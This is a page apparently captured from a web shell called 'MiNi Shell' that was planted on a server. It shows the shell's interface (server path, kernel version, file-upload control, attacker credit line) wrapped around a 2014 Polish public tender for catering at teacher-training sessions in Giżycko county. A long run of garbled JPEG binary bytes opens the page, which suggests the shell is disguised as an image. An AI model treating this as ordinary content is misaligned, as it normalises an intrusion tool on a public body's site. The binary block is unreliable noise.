JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140225/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140225/37853-N-2014.html

<p class="kh_header"><b>Giżycko: Realizacja usługi cateringu podczas 2 etapu doskonalenia nauczycieli w ramach projektu 
pn. SORE działają w szkole - nowy model systemu doskonalenia nauczycieli w powiecie giżyckim</b><br>
<b>Numer ogłoszenia: 37853 - 2014; data zamieszczenia: 25.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zespół Obsługi Szkół i Placówek Oświatowych , ul. Smętka 7, 11-500 Giżycko, woj. warmińsko-mazurskie, tel. 87 429 9434, faks 87 428 4565.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pzosipo.gizycko.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja usługi cateringu podczas 2 etapu doskonalenia nauczycieli w ramach projektu 
pn. SORE działają w szkole - nowy model systemu doskonalenia nauczycieli w powiecie giżyckim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest realizacja usługi cateringu podczas 2 etapu (wykładów i konsultacji) doskonalenia nauczycieli będących członkami Rad Pedagogicznych w 43 placówkach oświatowych położonych na terenie powiatu giżyckiego.
2.    Usługą są objęci uczestnicy projektu - nauczyciele, eksperci oraz pracownicy SORE. 
3.   Usługi objęte zamówieniem są częścią projektu pt. SORE działają w szkole - nowy model systemu doskonalenia nauczycieli w powiecie giżyckim, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego realizowanego w ramach Priorytetu III. Wysoka jakość systemu oświaty, Działania 3.5. Kompleksowe wspomaganie rozwoju szkół Programu Operacyjnego Kapitał Ludzki.
4. Realizacja usługi musi odbyć się zgodnie z harmonogramem określonym 
w Załączniku Nr 4 do SIWZ, przy czym Zamawiający zastrzega sobie prawo zmiany terminu realizacji poszczególnych elementów umowy, o czym powiadomi Wykonawcę na min. 2 dni przed planowanym terminem realizacji umowy. 
5.   Usługa cateringowa każdego dnia wykładów i konsultacji ma polegać na zapewnieniu w miejscu ich realizacji:
      - przerwy obiadowej.
	W ramach pojedynczego posiłku określonego jako przerwa obiadowa Wykonawca musi zapewnić dla każdej osoby  uczestniczącej: 
	-posiłek w formie drugiego dania zapakowany w opakowanie jednorazowe plastikowe + sztućce, w tym.: porcja mięsna/rybna + ziemniaki lub inny dodatek węglowodanowy, surówka- Posiłek nie może się powtarzać dla tej samej grupy; 
	-butelkę wody mineralnej niegazowanej o pojemności 0,5 l.
	- 1 sztukę pieczywa słodkiego (np. bułeczka drożdżowa, rogalik, jagodzianka, pączek), 
	- kawę rozpuszczalną - 10gram, 
	- 1 saszetkę herbaty, 
	- 1 śmietankę do kawy - 10ml.
	- cukier -  20 gram.
	
6.    Planowana liczba uczestników oraz ilość spotkań została określona dla poszczególnych placówek w punkcie 10 niniejszego rozdziału z podaniem miejsca realizacji. Zamawiający przekaże informację o ostatecznej ilości osób danego dnia i w danej placówce na 2 dni przed terminem określonym w harmonogramie (Załącznik nr 4).
Ilość spotkań dla poszczególnych placówek może ulec zmianie.
7.     Obowiązki Wykonawcy: 
-Posiłki w formie drugie dania winny być gorące i gotowe do spożycia. Przygotowane, dostarczone i podane posiłki będą świeże, pierwszej jakości, zamknięte w pojemnikach przeznaczonych dla produktów wymagających stałych warunków temperaturowych. 
-Wykonawca zapewni sztućce do spożycia posiłków.
-Posiłki powinny posiadać odpowiednie walory smakowe i zapachowe oraz estetyczny wygląd. Wykonawca przy oferowaniu obiadów uwzględniać będzie świeże produkty.
-Wyżywienie powinno spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia.
-W przypadku stwierdzenia przy odbiorze posiłków braków jakościowych świadczonych usług, Zamawiającemu przysługiwać będzie prawo obniżenia wynagrodzenia bądź zerwania umowy z tytułu realizowanej usługi przez Wykonawcę.
-Łączna szacunkowa ilość posiłków wynosi: 1686 sztuk.
-Wykonawca zapewni transport posiłków, którego wartość wliczy w cenę jednostkową posiłku.
-Sporządzenie protokołu odbioru usługi w danej placówce - według wzoru przekazanego przez Zamawiającego;
-Wykonawca zobowiązuje się do przechowania dokumentów związanych realizacją zamówienia w tym także dokumentów finansowych nie krócej niż do 31.12.2020 r.
8. 	Zamawiający zastrzega sobie prawo do oceny, jakości realizowanej usługi przez Wykonawcę. 	Kontrolę będą przeprowadzały osoby wyznaczone przez Zamawiającego w tym Personel 	Projektu.
9. 	W przypadku stwierdzenia przy odbiorze posiłków braków jakościowych świadczonych usług, 	Zamawiającemu przysługiwać będzie prawo obniżenia wynagrodzenia bądź zerwania umowy 	z tytułu realizowanej usługi przez Wykonawcę.

10. Planowana liczba uczestników oraz miejsce realizacji usługi:
Liczba uczestników nie obejmuje SORE (pracowników Zamawiającego), którzy będą uczestniczyć w warsztatach, ale zostali oni przypisani tylko do niektórych grup, ze względu na realizację wykładów i konsultacji w tym samym terminie.
Łączna planowana ilość posiłków wynosi: 1686 sztuk.
-Przedszkole BAJKA
Miejsce wykonania usługi: ul. Wodociągowa 15, Giżycko
Przewidywana liczba uczestników zajęć: 16 osób + 1 ekspert  + SORE
Przewidywana ilość spotkań: 2
Szacunkowa ilość posiłków: 36

-Przedszkola Niepublicznego Koralik 
Miejsce wykonania usługi: ul. Daszyńskiego 14
Przewidywana liczba uczestników zajęć: 7 osób + ekspert +SORE
Przewidywana ilość spotkań: 3
Szacunkowa ilość posiłków: 18

-Przedszkole Samorządowe przy Zespole Placówek Oświatowych w Miłkach 
Miejsce wykonania usługi: ul. Szkolna 1a, Miłki
Przewidywana liczba uczestników zajęć: 5 osób + ekspert +SORE
Przewidywana ilość spotkań: 3
Szacunkowa ilość posiłków: 21

-Szkoła Podstawowa w Rydzewie 
Miejsce wykonania usługi: ul. Mazurska 94, Rydzewo
Przewidywana liczba uczestników zajęć: 9 osób +  2 ekspertów +SORE
Przewidywana ilość spotkań: 2
Szacunkowa ilość posiłków: 24

-Szkoła Podstawowa w Staświnach 
Miejsce wykonania usługi: Staświny 27
Przewidywana liczba uczestników zajęć: 11 osób + ekspert + SORE.
Przewidywana ilość spotkań: 2
Szacunkowa ilość posiłków: 26

-Zespół Szkół Elektronicznych i Informatycznych w Giżycku 
Miejsce wykonania usługi: ul. Mickiewicza 27, Giżycko
Przewidywana liczba uczestników zajęć: 43 osób + ekspert + SORE.
Przewidywana ilość spotkań: 2 spotkania w dwóch grupach
Szacunkowa ilość posiłków: 92

-Przedszkole Miejskie Nr 1 z oddziałem integracyjnym 
Miejsce wykonania usługi: ul. Drzymały 9, Giżycko
Przewidywana liczba uczestników zajęć: 15 osób + ekspert + SORE.
Przewidywana ilość spotkań: 2
Szacunkowa ilość posiłków: 34


-Przedszkole Miejskiego Nr 4 
Miejsce wykonania usługi: ul. Jagiełły 3, Giżycko
Przewidywana liczba uczestników zajęć: 17 osób + ekspert + SORE.
Przewidywana ilość spotkań: 2
Szacunkowa ilość posiłków: 38


-Szkoła Podstawowa nr 4
Miejsce wykonania usługi: ul. 3 Maja 21, Giżycko
Przewidywana liczba uczestników zajęć: 34 osób + 2 ekspertów + SORE.
Przewidywana ilość spotkań: 2
Szacunkowa ilość posiłków: 72

-Szkoła Podstawowa nr 6 
Miejsce wykonania usługi: ul. Pionierska 13, Giżycko
Przewidywana liczba uczestników zajęć: 19 osób + ekspert + SORE.
Przewidywana ilość spotkań: 2
Szacunkowa ilość posiłków: 42

-Szkoła Podstawowa nr 7 
Miejsce wykonania usługi: ul. Wodociągowa 8, Giżycko
Przewidywana liczba uczestników zajęć: 45 osób + 2 ekspertów + SORE.
Przewidywana ilość spotkań: 4
Szacunkowa ilość posiłków: 192

-Szkoła Podstawowa nr 3 z oddziałem integracyjnym w Zespole Szkół Nr 1 w Giżycku 
Miejsce wykonania usługi: ul. Wiejska 50, Giżycko
Przewidywana liczba uczestników zajęć: 16 osób + ekspert + SORE.
Przewidywana ilość spotkań: 1
Szacunkowa ilość posiłków: 36

-Gimnazjum nr 1 im. Jana Pawła II w Giżycku 
Miejsce wykonania usługi: ul. Gimnazjalna 1, Giżycko
Przewidywana liczba uczestników zajęć: 18 osób + ekspert + SORE.
Przewidywana ilość spotkań: 3
Szacunkowa ilość posiłków: 60

-Gimnazjum nr 2 
Miejsce wykonania usługi: ul. Warszawska 39, Giżycko
Przewidywana liczba uczestników zajęć: 33 osób + 2 ekspertów + SORE.
Przewidywana ilość spotkań: 1
Szacunkowa ilość posiłków: 36

-Gimnazjum Nr 3 przy Zespole Szkół nr 1 
Miejsce wykonania usługi: ul. Wiejska 50, Giżycko
Przewidywana liczba uczestników zajęć: 21 osób + ekspert + SORE.
Przewidywana ilość spotkań: 1
Szacunkowa ilość posiłków: 23

-Szkoła Podstawowa w Wilkasach
Miejsce wykonania usługi: ul. Szkolna 8, Wilkasy 
Przewidywana liczba uczestników zajęć: 24 osób + ekspert + SORE.
Przewidywana ilość spotkań: 2
Szacunkowa ilość posiłków: 52

-Szkoła Podstawowa w Bystrym 
Miejsce wykonania usługi: Bystry 8a, koło Giżycka
Przewidywana liczba uczestników zajęć: 12 osób + ekspert + SORE.
Przewidywana ilość spotkań: 2
Szacunkowa ilość posiłków: 28

-Szkoła Podstawowa w Upałtach 
Miejsce wykonania usługi: Upałty 11
Przewidywana liczba uczestników zajęć: 11 osób + ekspert + SORE.
Przewidywana ilość spotkań: 1
Szacunkowa ilość posiłków: 13

-Szkoła Podstawowa w Spytkowie 
Miejsce wykonania usługi: Spytkowo 41
Przewidywana liczba uczestników zajęć: 7 osób + ekspert + SORE.
Przewidywana ilość spotkań: 1
Szacunkowa ilość posiłków: 9

-Gimnazjum Wilkasy 
Miejsce wykonania usługi: ul. Olsztyńska 29, Wilkasy
Przewidywana liczba uczestników zajęć: 16 osób + ekspert + SORE.
Przewidywana ilość spotkań: 1
Szacunkowa ilość posiłków: 18

-Gimnazjum Bystry 
Miejsce wykonania usługi: Bystry 1i
Przewidywana liczba uczestników zajęć: 10 osób + ekspert + SORE.
Przewidywana ilość spotkań: 2
Szacunkowa ilość posiłków: 24

-Szkoła Podstawowa w Kruklankach 
Miejsce wykonania usługi: ul. 22-ego Lipca 34, Kruklanki
Przewidywana liczba uczestników zajęć: 11 osób + ekspert + SORE.
Przewidywana ilość spotkań: 2
Szacunkowa ilość posiłków: 26

-Szkoła Podstawowa w Boćwince 
Miejsce wykonania usługi: Boćwinka 12
Przewidywana liczba uczestników zajęć: 11 osób + ekspert + SORE.
Przewidywana ilość spotkań: 1
Szacunkowa ilość posiłków: 13

-Gimnazjum w Kruklankach 
Miejsce wykonania usługi: ul. 22-ego Lipca 34, Kruklanki
Przewidywana liczba uczestników zajęć: 18 osób + ekspert.
Przewidywana ilość spotkań: 2
Szacunkowa ilość posiłków: 38

-Punkt Wychowania Przedszkolnego Mały Artysta w Wydminach 
Miejsce wykonania usługi: ul. Grunwaldzka 36, Wydminy
Przewidywana liczba uczestników zajęć: 6 osób + ekspert + SORE.
Przewidywana ilość spotkań: 2
Szacunkowa ilość posiłków: 16

-Szkoła Podstawowa w Wydminach 
Miejsce wykonania usługi: ul. Grunwaldzka 94, Wydminy
Przewidywana liczba uczestników zajęć: 24 osób + ekspert + SORE.
Przewidywana ilość spotkań: 2
Szacunkowa ilość posiłków: 52

-Szkoła Podstawowa w Gawlikach Wielkich 
Miejsce wykonania usługi: Gawliki Wielkie 32
Przewidywana liczba uczestników zajęć: 11 osób + ekspert + SORE.
Przewidywana ilość spotkań: 3
Szacunkowa ilość posiłków: 39

-Szkoła Podstawowa w Talkach  
Miejsce wykonania usługi: Talki 2
Przewidywana liczba uczestników zajęć: 8 osób + ekspert + SORE.
Przewidywana ilość spotkań: 3
Szacunkowa ilość posiłków: 30

-Szkoła Podstawowa w Zelkach 
Miejsce wykonania usługi: Zelki 1
Przewidywana liczba uczestników zajęć: 8 osób + ekspert + SORE.
Przewidywana ilość spotkań: 2
Szacunkowa ilość posiłków: 20

-Gimnazjum przy Zespole Szkół Ogólnokształcących w Wydminach 
Miejsce wykonania usługi: ul. Grunwaldzka 94
Przewidywana liczba uczestników zajęć: 23 osób + ekspert.
Przewidywana ilość spotkań: 2
Szacunkowa ilość posiłków: 48


-Gimnazjum przy Zespole Szkół w Gawlikach Wielkich 
Miejsce wykonania usługi: Gawliki Wielkie 32
Przewidywana liczba uczestników zajęć: 9 osób + ekspert.
Przewidywana ilość spotkań: 3
Szacunkowa ilość posiłków: 30

-Szkoła Podstawowa przy Zespole Placówek Oświatowych w Miłki 
Miejsce wykonania usługi: ul. Szkolna 1a, Miłki
Przewidywana liczba uczestników zajęć: 11 osób + ekspert + SORE.
Przewidywana ilość spotkań: 3
Szacunkowa ilość posiłków: 39

-Gimnazjum w Miłkach
Miejsce wykonania usługi: ul. Szkolna 3, Miłki
Przewidywana liczba uczestników zajęć: 9 osób + ekspert.
Przewidywana ilość spotkań: 3
Szacunkowa ilość posiłków: 30

-Przedszkole w Rynie 
Miejsce wykonania usługi: ul. Hanki Sawickiej 8a, Ryn
Przewidywana liczba uczestników zajęć: 7 osób + ekspert + SORE.
Przewidywana ilość spotkań: 2
Szacunkowa ilość posiłków: 18

-Szkoła Podstawowa w Rynie 
Miejsce wykonania usługi: ul. Hanki Sawickiej 8a, Ryn
Przewidywana liczba uczestników zajęć: 22 osób + ekspert + SORE.
Przewidywana ilość spotkań: 2
Szacunkowa ilość posiłków: 48

-Gimnazjum w Rynie 
Miejsce wykonania usługi: ul. Hanki Sawickiej 8a, Ryn
Przewidywana liczba uczestników zajęć: 18 osób + ekspert.
Przewidywana ilość spotkań: 2
Szacunkowa ilość posiłków: 38

-Zasadnicza Szkoła Zawodowa nr 2 (ZSZ) 
Miejsce wykonania usługi: ul. I Dyw. im. T. Kościuszki 16, Giżycko
Przewidywana liczba uczestników zajęć: 7 osób + ekspert + SORE.
Przewidywana ilość spotkań: 1
Szacunkowa ilość posiłków: 9

-Technikum nr 3 (ZSZ) 
Miejsce wykonania usługi: ul. I Dyw. im. T. Kościuszki 16, Giżycko
Przewidywana liczba uczestników zajęć: 16 osób + ekspert.
Przewidywana ilość spotkań: 1
Szacunkowa ilość posiłków: 17

-Zespół Szkół Kształtowania Środowiska i Agrobiznesu 
Miejsce wykonania usługi: ul. I Dyw. im. T. Kościuszki 23, Giżycko
Przewidywana liczba uczestników zajęć: 48 osób + 1 ekspertów + SORE.
Przewidywana ilość spotkań: 2
Szacunkowa ilość posiłków: 100

-I Liceum Ogólnokształcące w Giżycku
Miejsce wykonania usługi: ul. Traugutta 1, Giżycko
Przewidywana liczba uczestników zajęć: 25 osób + 2 ekspertów + SORE.
Przewidywana ilość spotkań: 2
Szacunkowa ilość posiłków: 54


-II Liceum Ogólnokształcące w Giżycku  
Miejsce wykonania usługi: ul. Sikorskiego 3, Giżycko
Przewidywana liczba uczestników zajęć: 29 osób + ekspert + SORE.
Przewidywana ilość spotkań: 3
Szacunkowa ilość posiłków: 93

-Liceum Ogólnokształcące przy ZDZ (dla młodzieży)
Miejsce wykonania usługi: ul. Kopernika 5, Giżycko
Przewidywana liczba uczestników zajęć: 7 osób + ekspert + SORE.
Przewidywana ilość spotkań: 2
Szacunkowa ilość posiłków: 18

-Technikum przy ZDZ 
Miejsce wykonania usługi: ul. Kopernika 5, Giżycko
Przewidywana liczba uczestników zajęć: 7 osób + ekspert.
Przewidywana ilość spotkań: 2
Szacunkowa ilość posiłków: 16.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.32.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 06.03.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Wypełniony i podpisany Formularz Oferty - Załącznik nr 1 do SIWZ;
b)	Oświadczenie o akceptacji warunków umowy - Załącznik nr 3 do SIWZ;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w zakresie terminów realizacji usługi, w przypadku, gdy o taką zmianę wystąpi placówka, na rzecz, której ma być realizowana usługa. Zamawiający powiadomi Wykonawcę o ewentualnej zmianie na 2 dni przed upływem terminu realizacji usługi w danej placówce.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pzosipo.gizycko.edu.pl/, http://bip.warmia.mazury.pl/powiat_gizycki<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zespół Obsługi Szkół i Placówek Oświatowych w Giżycku 
ul. Smętka 7, 11-500 Giżycko, pok. 28.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.03.2014 godzina 11:00, miejsce: Powiatowy Zespół Obsługi Szkół i Placówek Oświatowych w Giżycku 
ul. Smętka 7 11-500 Giżycko, pok. 21.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> SORE działają w szkole - nowy model systemu doskonalenia nauczycieli w powiecie 	giżyckim, współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com